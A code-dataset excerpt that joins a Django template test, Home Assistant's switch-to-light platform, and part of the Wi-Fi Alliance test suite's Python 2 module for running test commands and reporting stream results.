@setup(inheritance_templates)
def test_inheritance42(self):
"""
Expression starting and ending with a quote
"""
output = self.engine.render_to_string('inheritance42')
self.assertEqual(output, '1234')
| bsd-3-clause |
leppa/home-assistant | homeassistant/components/switch/light.py | 3 | 4057 | """Light support for switch entities."""
import logging
from typing import Callable, Dict, Optional, Sequence, cast
import voluptuous as vol
from homeassistant.components import switch
from homeassistant.components.light import PLATFORM_SCHEMA, Light
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_ENTITY_ID,
CONF_NAME,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import CALLBACK_TYPE, State, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_state_change
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
# mypy: allow-untyped-calls, allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Light Switch"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Required(CONF_ENTITY_ID): cv.entity_domain(switch.DOMAIN),
}
)
async def async_setup_platform(
hass: HomeAssistantType,
config: ConfigType,
async_add_entities: Callable[[Sequence[Entity], bool], None],
discovery_info: Optional[Dict] = None,
) -> None:
"""Initialize Light Switch platform."""
async_add_entities(
[LightSwitch(cast(str, config.get(CONF_NAME)), config[CONF_ENTITY_ID])], True
)
class LightSwitch(Light):
"""Represents a Switch as a Light."""
def __init__(self, name: str, switch_entity_id: str) -> None:
"""Initialize Light Switch."""
self._name = name
self._switch_entity_id = switch_entity_id
self._is_on = False
self._available = False
self._async_unsub_state_changed: Optional[CALLBACK_TYPE] = None
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
@property
def is_on(self) -> bool:
"""Return true if light switch is on."""
return self._is_on
@property
def available(self) -> bool:
"""Return true if light switch is on."""
return self._available
@property
def should_poll(self) -> bool:
"""No polling needed for a light switch."""
return False
async def async_turn_on(self, **kwargs):
"""Forward the turn_on command to the switch in this light switch."""
data = {ATTR_ENTITY_ID: self._switch_entity_id}
await self.hass.services.async_call(
switch.DOMAIN, switch.SERVICE_TURN_ON, data, blocking=True
)
async def async_turn_off(self, **kwargs):
"""Forward the turn_off command to the switch in this light switch."""
data = {ATTR_ENTITY_ID: self._switch_entity_id}
await self.hass.services.async_call(
switch.DOMAIN, switch.SERVICE_TURN_OFF, data, blocking=True
)
async def async_update(self):
"""Query the switch in this light switch and determine the state."""
switch_state = self.hass.states.get(self._switch_entity_id)
if switch_state is None:
self._available = False
return
self._is_on = switch_state.state == STATE_ON
self._available = switch_state.state != STATE_UNAVAILABLE
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
@callback
def async_state_changed_listener(
entity_id: str, old_state: State, new_state: State
) -> None:
"""Handle child updates."""
self.async_schedule_update_ha_state(True)
assert self.hass is not None
self._async_unsub_state_changed = async_track_state_change(
self.hass, self._switch_entity_id, async_state_changed_listener
)
async def async_will_remove_from_hass(self):
"""Handle removal from Home Assistant."""
if self._async_unsub_state_changed is not None:
self._async_unsub_state_changed()
self._async_unsub_state_changed = None
self._available = False
| apache-2.0 |
jackalchen/Wi-FiTestSuite-UCC | python/Result-Processing-myutils.py | 4 | 59903 | ###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import HTML
from xml.dom.minidom import Document
from XMLLogger import XMLLogger
VERSION = "4.2.0"
conntable = {}
retValueTable = {}
DisplayNameTable = {}
streamSendResultArray = []
streamRecvResultArray = []
streamInfoArray = []
runningPhase = '1'
testRunning = 0
threadCount = 0
resultPrinted = 0
ifcondBit = 1
iDNB = 0
iINV = 0
RTPCount = 1
#default command file path
uccPath = '..\\..\\cmds'
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
#Define extra colours
FOREGROUND_WHITE = FOREGROUND_RED | FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_YELLOW = FOREGROUND_RED | FOREGROUND_GREEN
FOREGROUND_CYAN = FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_MAGENTA = FOREGROUND_RED | FOREGROUND_BLUE
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
cSLog = ""
class classifiedLogs:
"""Global Handler for classified Logs"""
def __init__(self, name, fileName, msg=""):
self.name = name
self.fileD = open(fileName, 'a')
self.msg = msg
self.fileD.write("%s\n" % msg)
#time.strftime("%H-%M-%S_%b-%d-%y", time.localtime())
def log(self, msg):
"""Print out time and message into file"""
self.fileD.write("%s | %s \n" %(time.strftime("%b:%d:%Y-%H:%M:%S",
time.localtime()), msg))
def __str__(self):
return "%s:%s" %(self.fileName, self.msg)
def __del__(self):
self.fileD.close()
class streamInfo:
"""Returns string in formatted stream info"""
def __init__(self, streamID, IPAddress, pairID, direction,
trafficClass, frameRate, phase, RTPID):
self.streamID = streamID
self.IPAddress = IPAddress
self.pairID = pairID
self.direction = direction
self.trafficClass = trafficClass
self.frameRate = frameRate
self.phase = phase
self.status = -1
self.RTPID = RTPID
def __str__(self):
return "%-10s Stream ID = %s , IP Address = %s \n\r%-10s pairID = %s direction = %s \n\r%-10s frameRate =%s \n\r%-10s status =%s %s" % (' ', self.streamID, self.IPAddress, ' ', self.pairID, self.direction, ' ', self.frameRate, ' ', self.status, self.phase)
class streamResult:
"""Returns string in formatted stream result"""
def __init__(self, streamID, IPAddress, rxFrames, txFrames, rxBytes,
txBytes, phase):
self.streamID = streamID
self.IPAddress = IPAddress
self.rxFrames = rxFrames
self.txFrames = txFrames
self.rxBytes = rxBytes
self.txBytes = txBytes
self.phase = phase
#print 'self = %s streamID =%s' % (self,streamID)
def __str__(self):
return "%-10s RX %10s Bytes | TX %10s | Stream ID = %s" % (' ', self.rxBytes, self.txBytes, self.streamID)
# socket desc list to be used by select
waitsocks, readsocks, writesocks = [], [], []
#Multicast test
multicast = 0
def set_color(color, handle=std_out_handle):
"""(color) -> BOOL
Example: set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
"""
bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return bool
def setUCCPath(path):
"""Set absolute path of cmds or script location"""
global uccPath
uccPath = path
return
def scanner(fileobject, linehandler):
"""Scan file objects"""
for line in fileobject.readlines():
if not line: break
linehandler(line)
def sock_tcp_conn(ipaddr, ipport):
"""function for client socket connection set to blocking mode"""
global readsocks, waitsocks, deftimeout
buf = 2048
addr = (ipaddr, ipport)
mysock = socket(AF_INET, SOCK_STREAM)
try:
mysock.connect(addr)
except:
exc_info = sys.exc_info()
logging.error('Connection Error, IP = %s PORT = %s REASON = %s',
ipaddr, ipport, exc_info[1])
wfa_sys_exit("IP-%s:%s REASON = %s" % (ipaddr, ipport, exc_info[1]))
readsocks.append(mysock)
# Add the descriptor to select wait
waitsocks.append(mysock)
return mysock
def process_ipadd(line):
"""function to parse IP address and port number. Create socket connection if not already."""
global conntable
i = 0
addrlist = []
addrlist = line.split(':')
naddr = len(addrlist)
while i < naddr:
ip = addrlist[i].split(',', 1)
ipa = ip[0].split('=')[1] # ip adress
ipp = ip[1].split('=')[1] # ip port
logging.info('Connecting to - IP Addr = %s Port = %s', ipa, ipp)
sockhdlr = sock_tcp_conn(ipa, int(ipp))
conntable["%s:%s" %(ipa, ipp)] = sockhdlr
i = i+1
def close_conn():
global conntable
def printStreamResults():
"""Determines if WMM or WPA2 before printing results"""
global resultPrinted
ProgName = os.getenv("PROG_NAME")
if resultPrinted == 1:
return
XLogger.setTestResult("COMPLETED")
if ProgName == "P2P":
return
if "WPA2Test" in retValueTable:
logging.debug("WPA2 Results")
printStreamResults_WPA2()
else:
printStreamResults_WMM()
def printStreamResults_WPA2():
"""Prints stream results of WPA2"""
global resultPrinted
maxRTP = 1
set_color(FOREGROUND_WHITE)
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- %s --> %s -----" %
("", sDisplayAddress, pDisplayAddress))
logging.info("\n%s" % s)
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
def printStreamResults_WMM():
"""Prints stream results of WMM"""
global resultPrinted
summaryList = {}
summaryStreamDisplay = {}
maxRTP = 1
i = 1
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- RTP_%s-%s ( %s --> %s ) PHASE = %s -----" %("", r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress, phase))
logging.info("\n%s" % s)
summaryList.setdefault("%s:%s"%(int(r.RTPID), int(phase)), p.rxBytes)
summaryStreamDisplay.setdefault("%s:%s" % (int(r.RTPID), int(phase)), "RTP%-1s_%-10s [%s-->%s]" % (r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress))
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
logging.info("--------------------------SUMMARY----------------------------------")
logging.info(" %46s %10s | %10s" % ("|", "Phase1 (Bytes)", "Phase2 (Bytes)"))
logging.info("-------------------------------------------------------------------")
while i <= maxRTP:
str1 = ""
str2 = ""
stremDisplay = ""
if "%s:%s"%(i, "1") in summaryList:
str1 = summaryList["%s:%s" % (i, "1")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "1")]
if "%s:%s"%(i, "2") in summaryList:
str2 = summaryList["%s:%s" % (i, "2")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "2")]
logging.info("\n%6s %-43s %5s %10s | %10s" % (" ", stremDisplay, "|", str1, str2))
i = i + 1
set_color(FOREGROUND_INTENSITY)
def responseWaitThreadFunc(_threadID, command, addr, receiverStream):
global waitsocks, readsocks, writesocks, runningPhase, testRunning, streamInfoArray
logging.debug("responseWaitThreadFunc started %s" % testRunning)
while testRunning > 0:
readables, writeables, exceptions = select(readsocks, writesocks, [], 0.1)
for sockobj in readables:
if sockobj in waitsocks:
resp = sockobj.recv(2048)
resp_arr = resp.split(',')
for socks in conntable:
if sockobj == conntable[socks]:
responseIPAddress = socks
displayaddr = responseIPAddress
if responseIPAddress in DisplayNameTable:
displayaddr = DisplayNameTable[responseIPAddress]
logging.info("%-15s <--1 %s" % (displayaddr, resp))
# Check for send stream completion
if len(resp_arr) > 2:
if resp_arr[3] == '':
logging.error("NULL streamID returned from %s" % responseIPAddress)
continue
if resp_arr[2] == 'streamID':
logging.debug("STREAM COMPLETED = %s" % (resp_arr[3]))
# spliting the values of multiple streams
idx = resp_arr[3].strip()
idx = idx.split(' ')
sCounter = 0 # For multiple stream value returns
if resp_arr[7].split(' ')[sCounter] == '':
sCounter = 1
for i in idx:
txFrames = resp_arr[5].split(' ')[sCounter]
logging.debug(" TXFRAMES = %s" % txFrames)
i = ("%s;%s"%(i, responseIPAddress))
if txFrames != '0':
logging.info("%s (%-15s) <-- SEND Stream - %s Completed " % (displayaddr, responseIPAddress, i))
# Setting status complete
for p in streamInfoArray:
if p.IPAddress == responseIPAddress and p.streamID == i and p.phase == runningPhase:
p.status = 1
streamSendResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
else:
streamRecvResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
logging.info("%s (%-15s) <---- RECV Stream - %s Completed " % (displayaddr, responseIPAddress, i))
sCounter += 1
else:
logging.debug('Unwanted data on socket')
logging.debug("\n THREAD STOPPED ")
return
def process_cmd(line):
"""
Process CAPI commands and send through socket if necessary
Parameters
----------
line : str
CAPI command followed by parameters with "," as delimiter
Returns
-------
none
Examples
--------
process_cmd(ca_get_version)
process_cmd(sniffer_control_filter_capture,infile,_521-step1,
outfile,521-step1_A,srcmac,00:11:22:33:44:55,
destmac,55:44:33:22:11:00)
"""
global conntable, threadCount, waitsocks_par, runningPhase, testRunning, streamInfoArray, resultPrinted
global retValueTable, RTPCount, multicast, ifcondBit, iDNB, iINV, ifCondBit, socktimeout
line = line.rstrip()
str = line.split('#')
recv_id = {}
try:
if str[0] == '':
return
command = str[0].split('!')
if command[0].lower() == "else":
if int(ifCondBit):
ifCondBit = 0
else:
ifCondBit = 1
return
if command[0].lower() == "endif":
ifCondBit = 1
return
if command[0].lower() == "if":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if command[3] in retValueTable:
command[3] = retValueTable[command[3]]
if(command[2]).lower() == "=":
if (command[1]).lower() == (command[3]).lower():
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == ">":
if long(command[1]) > long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<":
if long(command[1]) < long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == ">=":
if long(command[1]) >= long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<=":
if long(command[1]) <= long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<>":
if (command[1]).lower() != (command[3]).lower():
ifcondBit = 1
else:
ifcondBit = 0
return
if int(ifcondBit) == 0:
return
if command[0].lower() == "_dnb_":
iDNB = 1
return
if command[0].lower() == "_inv":
iINV = 1
return
if command[0].lower() == "inv_":
iINV = 0
return
if command[0].lower() == "mexpr":
if command[1] not in retValueTable:
return
if command[3] in retValueTable:
command[3] = retValueTable[command[3]]
if command[2] == "%":
retValueTable[command[1]] = (int(retValueTable[command[1]]) * int(command[3])) / 100
return
if command[0].lower() == "extract_p2p_ssid":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
p2p_ssid = command[1].split(' ')
if len(p2p_ssid) > 1:
retValueTable.setdefault("$P2P_SSID", "%s" % p2p_ssid[1])
else:
logging.error("Invalid P2P Group ID")
return
if command[0].lower() == "calculate_ext_listen_values":
if command[1] not in retValueTable or command[2] not in retValueTable:
wfa_sys_exit("%s or %s not available" % (command[1], command[2]))
command[1] = retValueTable[command[1]]
command[2] = retValueTable[command[2]]
retValueTable.setdefault("$PROBE_REQ_INTERVAL", "%s" % (int(command[2]) / 2))
retValueTable.setdefault("$PROBE_REQ_COUNT", "%s" % (int(command[1]) / (int(command[2]) / 2)))
return
if command[0].lower() == "get_rnd_ip_address":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
ip1 = command[1].split(".")
ip2 = command[2].split(".")
if (int(ip2[3]) + 1) != int(ip1[3]):
rnd_ip = ("%s.%s.%s.%s" % (ip2[0], ip2[1], ip2[2], int(ip2[3]) + 1))
else:
rnd_ip = ("%s.%s.%s.%s" % (ip2[0], ip2[1], ip2[2], int(ip2[3]) + 2))
retValueTable.setdefault(command[3], "%s" % rnd_ip)
return
if command[0].lower() == 'ucc_form_device_discovery_frame':
iCn = 0
for c in command:
if iCn > 1 and c in command:
wfa_sys_exit("Invalid UCC command")
#command[1] Frame command[2] GOUT Device Address command[3] group ID command[4] Injector source Address command[5] Testbed Client address
f = command[1].split('*')
iCn = 0
#Hex SSID
SSID = retValueTable[command[3]].split(" ")[1]
SSIDLength = len(SSID)
SSIDLen1 = hex(int(SSIDLength) + 22).split("0x")[1]
SSIDLen2 = "%s 00" % hex(int(SSIDLength + 6)).split("0x")[1]
if int(len(SSIDLen2)) < 5:
SSIDLen2 = "0%s" % SSIDLen2
hexSSID = ""
for s in SSID:
h = hex(ord(s)).split("0x")[1]
hexSSID = hexSSID + h
logging.debug("hexSSID = %s hexLength %s" % (hexSSID, SSIDLength))
FrameData = "%s%s%s%s%s%s%s%s%s%s%s%s" % (f[0],
retValueTable[command[2]],
retValueTable[command[4]],
retValueTable[command[2]],
f[3],
SSIDLen1,
f[4],
retValueTable[command[5]],
f[5],
SSIDLen2,
retValueTable[command[2]],
hexSSID)
logging.debug(FrameData)
retValueTable.setdefault("$INJECT_FRAME_DATA", FrameData)
if command[0].lower() == 'addstaversioninfo':
vInfo = command[1].split(",")
i = 0
if len(vInfo) < 5:
logging.info("Incorrect version format")
return
if vInfo[0] not in retValueTable:
logging.debug("Unknown Component[1] %s", vInfo[0])
return
if retValueTable[vInfo[0]] not in conntable:
if retValueTable[retValueTable[vInfo[0]]] not in conntable:
logging.debug("Unknown Component[3] %s", vInfo[0])
return
#print vInfo
print len(retValueTable)
for c in vInfo:
if c in retValueTable:
vInfo[i] = retValueTable[c]
if vInfo[i] in DisplayNameTable:
vInfo[i] = DisplayNameTable[vInfo[i]]
i = i + 1
XLogger.AddTestbedDevice(vInfo[1], vInfo[2], vInfo[3], vInfo[4])
logging.debug(vInfo)
return
if command[0].lower() == 'adduccscriptversion':
XLogger.AddWTSComponent("UCC", VERSION, command[1])
if command[0].lower() == 'addwtscompversioninfo' or command[0].lower() == 'adddutversioninfo':
vInfo = command[1].split(",")
i = 0
if len(vInfo) < 5:
logging.info("Incorrect version format...")
return
if vInfo[0] in retValueTable:
vInfo[0] = retValueTable[vInfo[0]]
#print vInfo
print len(retValueTable)
for c in vInfo:
if c in retValueTable:
vInfo[i] = retValueTable[c]
if vInfo[i] in DisplayNameTable:
vInfo[i] = DisplayNameTable[vInfo[i]]
i = i + 1
if command[0].lower() == 'adddutversioninfo':
XLogger.AddDUTInfo(vInfo[1], vInfo[2], vInfo[3], vInfo[4])
logging.debug("DUT INFO [%s][%s][%s][%s]" % (vInfo[1], vInfo[2], vInfo[3], vInfo[4]))
else:
logging.debug("WTS Comp[%s][%s][%s][%s]" % (vInfo[1], vInfo[2], vInfo[3], vInfo[4]))
XLogger.AddWTSComponent(vInfo[0], vInfo[1], "%s:%s:%s" % (vInfo[2], vInfo[3], vInfo[4]))
logging.debug(vInfo)
return
if re.search("STA", command[0]):
if command[0] in retValueTable:
command[0] = retValueTable[command[0]]
else:
return
if command[0].lower() == 'exit':
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
wfa_sys_exit("Exiting - %s" % command[1])
if command[0].lower() == 'pause':
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
logging.info("Exeuction Paused - %s \n Press any key to continue..." % command[1])
sys.stdin.read(1)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'sleep':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
time.sleep(float(command[1]))
return
if command[0].lower() == 'userinput':
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
logging.info("[USER INPUT REQUIRED]")
udata = raw_input(command[1])
if command[2] in retValueTable:
retValueTable[command[2]] = udata
else:
retValueTable.setdefault(command[2], udata)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'userinput_ifnowts':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
logging.info("[USER INPUT REQUIRED]")
udata = raw_input(command[1])
if command[2] in retValueTable:
retValueTable[command[2]] = udata
else:
retValueTable.setdefault(command[2], udata)
set_color(FOREGROUND_INTENSITY)
return
if command[0].lower() == 'ifnowts':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
set_color(FOREGROUND_YELLOW | FOREGROUND_INTENSITY)
if len(command) > 3 and command[2] in retValueTable:
s = "- %s" % retValueTable[command[2]]
else:
s = ""
logging.info("%s %s\n Press any key to continue after done" % (command[1], s))
sys.stdin.read(1)
set_color(FOREGROUND_INTENSITY)
return
if command[0] == 'wfa_control_agent' or command[0] == 'wfa_control_agent_dut':
if retValueTable["$WTS_ControlAgent_Support"] == "0":
return
if command[0].lower() == 'getuccsystemtime':
timeStr = time.strftime("%H-%M-%S-%m-%d-%Y", time.localtime())
logging.debug("\n Reading UCC System time %s" % timeStr)
t = timeStr.split("-")
retValueTable.setdefault("$month", t[3])
retValueTable.setdefault("$date", t[4])
retValueTable.setdefault("$year", t[5])
retValueTable.setdefault("$hours", t[0])
retValueTable.setdefault("$minutes", t[1])
retValueTable.setdefault("$seconds", t[2])
logging.debug("""\n UCC System Time -
Month:%s:
Date:%s:
Year:%s:
Hours:%s:
Minutes:%s:
Seconds:%s:""" %
(retValueTable["$month"],
retValueTable["$date"],
retValueTable["$year"],
retValueTable["$hours"],
retValueTable["$minutes"],
retValueTable["$seconds"]))
return
if command[0].lower() == 'r_info':
rdata = "-"
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if len(command) > 1:
rdata = command[2]
resultPrinted = 1
set_test_result(command[1], rdata, "-")
XLogger.setTestResult(command[1], rdata)
wfa_sys_exit_0()
return
if command[0].lower() == 'info':
set_color(FOREGROUND_CYAN | FOREGROUND_INTENSITY)
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
logging.info("\n %7s ~~~~~ %s ~~~~~ \n" %("", command[1]))
set_color(FOREGROUND_INTENSITY)
return
if re.search('esultIBSS', command[0]):
time.sleep(5)
printStreamResults()
process_passFailIBSS(command[1])
return
elif re.search('define', command[0]):
logging.debug("..Define %s = %s"%(command[1], command[2]))
if command[1] in retValueTable:
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
retValueTable[command[1]] = command[2]
else:
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
retValueTable.setdefault(command[1], command[2])
return
elif command[0].lower() == 'echo':
if command[1] in retValueTable:
logging.info("%s=%s" % (command[1], retValueTable[command[1]]))
else:
logging.info("Unknown variable %s" %command[1])
return
elif command[0].lower() == 'echo_ifnowts' and retValueTable["$WTS_ControlAgent_Support"] == "0":
if command[1] in retValueTable:
logging.info("-%s=%s-" % (command[1], retValueTable[command[1]]))
else:
logging.info("%s" % command[1])
return
elif command[0].lower() == 'storethroughput':
cmd = command[2].split(",")
logging.debug("Storing the Throughput(Mbps) value of stream %s[%s %s] in %s duration=%s p=%s", cmd[0], cmd[3], "%", command[1], retValueTable[cmd[2]], cmd[1])
P1 = -1
for p in streamRecvResultArray:
if p.streamID == retValueTable[cmd[0]] and int(p.phase) == int(cmd[1]):
P1 = p.rxBytes
P1 = int(int(P1) / 100) * int(cmd[3])
P1 = ((float(P1) * 8))/(1000000 * int(retValueTable[cmd[2]]))
break
logging.info("Storing %s = %s [Mbps]", command[1], P1)
if command[1] in retValueTable:
retValueTable[command[1]] = P1
else:
retValueTable.setdefault(command[1], P1)
return
elif command[0].lower() == 'resultwmm':
time.sleep(5)
printStreamResults()
process_passFailWMM(command[1])
return
elif command[0].lower() == 'resultwmm_1':
time.sleep(5)
printStreamResults()
process_passFailWMM_1(command[1])
return
elif re.search('CheckThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckThroughput(command[1], 0)
return
elif re.search('CheckMCSThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckMCSThroughput(command[1])
return
elif re.search('CheckDT4Result', command[0]):
time.sleep(5)
printStreamResults()
process_CheckDT4(command[1])
return
elif re.search('TransactionThroughput', command[0]):
time.sleep(5)
printStreamResults()
process_CheckThroughput(command[1], 1)
return
elif re.search('esultCheck', command[0]):
time.sleep(5)
process_ResultCheck(command[1])
return
logging.debug("COMMAND - to %s" % command[0])
if command[0] == 'wfa_test_commands':
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
process_cmdfile("%s%s"%(uccPath, command[1]))
return
if command[0] == 'Phase':
RTPCount = 1
time.sleep(3)
logging.debug("Starting Phase - %s ..." % command[1])
runningPhase = command[1]
threadCount = 0
testRunning = 0
time.sleep(2)
return
if len(command) < 3:
logging.error('Incorrect format of line - %s', line)
return
ret_data_def = command[2]
ret_data_def_type = ret_data_def.split(',')
logging.debug("Command Return Type = %s" % (ret_data_def_type[0].lower()))
if ret_data_def_type[0] == 'STREAMID' or ret_data_def_type[0] == 'INTERFACEID' or ret_data_def_type[0] == 'PING':
ret_data_idx = ret_data_def_type[1]
elif ret_data_def_type[0] == 'RECV_ID':
recv_value = ret_data_def_type[1].split(' ')
i = 0
for r in recv_value:
recv_id[i] = r
i += 1
logging.debug('RECV ID %s', recv_id)
elif ret_data_def_type[0] == 'FILENAME':
upload_file_desc = open(ret_data_def_type[1], 'a')
logging.info('File desc= %s', upload_file_desc)
logging.info('Uploading to file - %s', ret_data_def_type[1])
if command[0] in retValueTable:
toaddr = retValueTable[command[0]]
else:
return
displayName = toaddr
if toaddr in DisplayNameTable:
displayName = DisplayNameTable[toaddr]
capi_run = command[1].strip()
capi_elem = command[1].split(',')
logging.debug("%s (%-15s) --> %s " % (displayName, toaddr, capi_elem))
if capi_elem[0] == 'traffic_agent_receive_stop':
idx = capi_elem.index('streamID')
# Wait for Send to finish, in case of receive_stop
sid = capi_elem[2].split(' ')
capi_elem[idx+1] = ''
for i in sid:
val = retValueTable[i]
if re.search(";", retValueTable[i]):
val = retValueTable[i].split(";")[0]
for p in streamInfoArray:
if p.pairID == retValueTable[i] and p.phase == runningPhase:
while p.status != 1:
#Minor sleep to avoid 100% CPU Usage by rapid while
time.sleep(0.1)
if multicast == 1:
capi_elem[idx+1] = val
break
else:
capi_elem[idx+1] += val
capi_elem[idx+1] += ' '
break
elif multicast == 1:
capi_elem[idx+1] = val
capi_run = ','.join(capi_elem)
capi_cmd = capi_run + ' \r\n'
logging.info("%s (%-10s) --> %s" % (displayName, toaddr, capi_cmd))
asock = conntable.get(toaddr)
asock.send(capi_cmd)
time.sleep(15)
return
elif capi_elem[0] == 'traffic_agent_send':
idx = capi_elem.index('streamID')
sid = capi_elem[2].split(' ')
capi_elem[idx+1] = ''
rCounter = 0
for i in sid:
#Making Send-receive Pair
for s in streamInfoArray:
if s.IPAddress == toaddr and s.streamID == retValueTable[i] and s.phase == runningPhase:
s.pairID = retValueTable[recv_id[rCounter]]
if re.search(";", retValueTable[i]):
val = retValueTable[i].split(";")[0]
else:
val = retValueTable[i]
capi_elem[idx+1] += val
capi_elem[idx+1] += ' '
rCounter += 1
capi_run = ','.join(capi_elem)
logging.info("%s (%-15s) --> %s " %(displayName, toaddr, capi_run))
# Pass the receiver ID for send stream
# Start the response wait thread (only once)
if threadCount == 0:
testRunning = 1
thread.start_new(responseWaitThreadFunc, (threadCount, capi_run, toaddr, recv_id))
threadCount = threadCount + 1
#Temporary Addition for VHT
capi_cmd = capi_run + ' \r\n'
asock = conntable.get(toaddr)
asock.send(capi_cmd)
return
else:
if capi_elem[0] == 'sniffer_control_stop':
time.sleep(2)
testRunning = 0
time.sleep(2)
#Replacing the placeholder(s) in command.
for id in retValueTable:
elementCounter = 0
for capiElem in capi_elem:
if capiElem == id:
if re.search(";", retValueTable[id]):
val = retValueTable[id].split(";")[0]
else:
val = retValueTable[id]
capi_elem[elementCounter] = val
logging.debug("Replacing the placeholder %s %s" % (id, capi_elem[elementCounter]))
elementCounter += 1
if capi_elem[0] == 'sta_up_load':
seq_no = 1
code_no = 1
while code_no != '0':
capi_elem[3] = "%s" % seq_no
seq_no += 1
status = send_capi_command(toaddr, capi_elem)
